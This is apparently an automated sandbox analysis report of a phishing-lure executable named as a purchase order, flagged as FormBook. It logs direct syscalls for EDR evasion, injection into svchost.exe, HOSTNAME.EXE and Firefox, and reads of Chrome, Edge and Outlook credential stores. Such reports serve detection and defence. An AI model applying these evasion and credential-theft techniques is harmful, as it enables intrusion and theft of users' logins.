Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]	1_2_031BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]	1_2_031649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_031FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]	1_2_031C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_031BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]	1_2_031BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]	1_2_0316A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]	1_2_03160854

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DA80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,

0_2_00DA80A9

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00D7A155
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7A124 SetUnhandledExceptionFilter,		0_2_00D7A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtCreateFile: Direct from: 0x77752FEC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtOpenFile: Direct from: 0x77752DCC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtSetInformationThread: Direct from: 0x777463F9	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQueryInformationToken: Direct from: 0x77752CAC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtTerminateThread: Direct from: 0x77752FCC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtProtectVirtualMemory: Direct from: 0x77752F9C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtSetInformationProcess: Direct from: 0x77752C5C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtNotifyChangeKey: Direct from: 0x77753C2C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtOpenKeyEx: Direct from: 0x77752B9C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtOpenSection: Direct from: 0x77752E0C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtProtectVirtualMemory: Direct from: 0x77747B2E	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtAllocateVirtualMemory: Direct from: 0x777548EC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQueryVolumeInformationFile: Direct from: 0x77752F2C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQuerySystemInformation: Direct from: 0x777548CC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtAllocateVirtualMemory: Direct from: 0x77752BEC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtCreateUserProcess: Direct from: 0x7775371C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtWriteVirtualMemory: Direct from: 0x7775490C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQueryInformationProcess: Direct from: 0x77752C26	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtResumeThread: Direct from: 0x77752FBC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtReadVirtualMemory: Direct from: 0x77752E8C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtCreateKey: Direct from: 0x77752C6C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtSetInformationThread: Direct from: 0x77752B4C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQueryAttributesFile: Direct from: 0x77752E6C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtCreateMutant: Direct from: 0x777535CC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtMapViewOfSection: Direct from: 0x77752D1C	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtResumeThread: Direct from: 0x777536AC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtReadFile: Direct from: 0x77752ADC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtQuerySystemInformation: Direct from: 0x77752DFC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtDelayExecution: Direct from: 0x77752DDC	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\HOSTNAME.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Thread register set: target process: 1384

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Thread APC queued: target process: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2688008

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DA87B1 LogonUserW,

0_2_00DA87B1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D53B3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00D548D7

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DB4C53 mouse_event,

0_2_00DB4C53

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00DA7CAF

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00DA874B

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1185302072.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620506124.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409993275.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000000.1561624536.0000000001360000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: PURCHASE ORDER N0259305-06SN.exe, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620506124.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409993275.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620506124.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409993275.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000000.1561624536.0000000001360000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620506124.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409993275.0000000001200000.00000002.00000001.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000000.1561624536.0000000001360000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D7862B cpuid

0_2_00D7862B

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D84E87

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D91E06 GetUserNameW,

0_2_00D91E06

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00D83F3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D549A0

Binary or memory string: procmon.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1491941126.0000000002F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1490919657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619572646.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3620847794.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619265503.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1492752235.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3620880215.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_81
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_XP
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_XPe
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_VISTA
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_7
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_8
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1185302072.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1491941126.0000000002F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1490919657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619572646.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3620847794.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619265503.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1492752235.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3620880215.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

